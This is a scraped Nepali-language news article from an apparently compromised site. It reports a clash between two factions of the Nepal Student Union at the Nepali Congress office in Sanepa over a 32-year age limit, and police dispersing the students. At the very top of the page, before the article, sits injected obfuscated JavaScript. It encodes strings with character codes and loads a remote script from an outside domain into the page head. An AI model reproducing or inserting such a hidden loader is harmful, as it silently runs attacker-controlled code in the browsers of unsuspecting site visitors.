Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,100,111,99,107,46,108,111,118,101,103,114,101,101,110,112,101,110,99,105,108,115,46,103,97,47,109,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})(); नेविसंघको दुई समूहबीच झडप – जनदिशा

नेविसंघको दुई समूहबीच झडप

Last Updated Date:

काठमाडौं । कांग्रेस भ्रातृ संगठन नेविसंघको दुई समूहबीच झडप भएको छ । नेविसंघमा ३२ वर्षे उमेर हद राख्ने र नराख्ने पक्ष कार्यालय प्रवेश गर्न खोज्दा झडप भएको हो ।

निवर्तमान महामन्त्री कुन्दनराज काफ्ले निकटका विद्यार्थी नेताले उमेर हदको पक्षमा र संस्थापन पक्षका विद्यार्थी नेताले उमेर हदको विपक्षमा प्रदर्शन गर्दा झडप भएको हो ।

नेपाली कांग्रेस पार्टी कार्यालय, सानेपा कार्यालयमा दुबै पक्ष प्रवेश गर्न खोज्दा झडप भएको थियो । सो क्रममा प्रहरीले लाठी चार्ज गर्दै विद्यार्थीहरुलाई तितरवितर पारेको थियो ।

झडपमा के कति विद्यार्थी घाइते भए यकिन भएको छैन ।

यो सामग्री सेयर गर्नुहोस

तपाईलाई माथिको समाचार/लेख कस्तो लाग्यो ? प्रतिक्रिया दिनुहोस ।
Top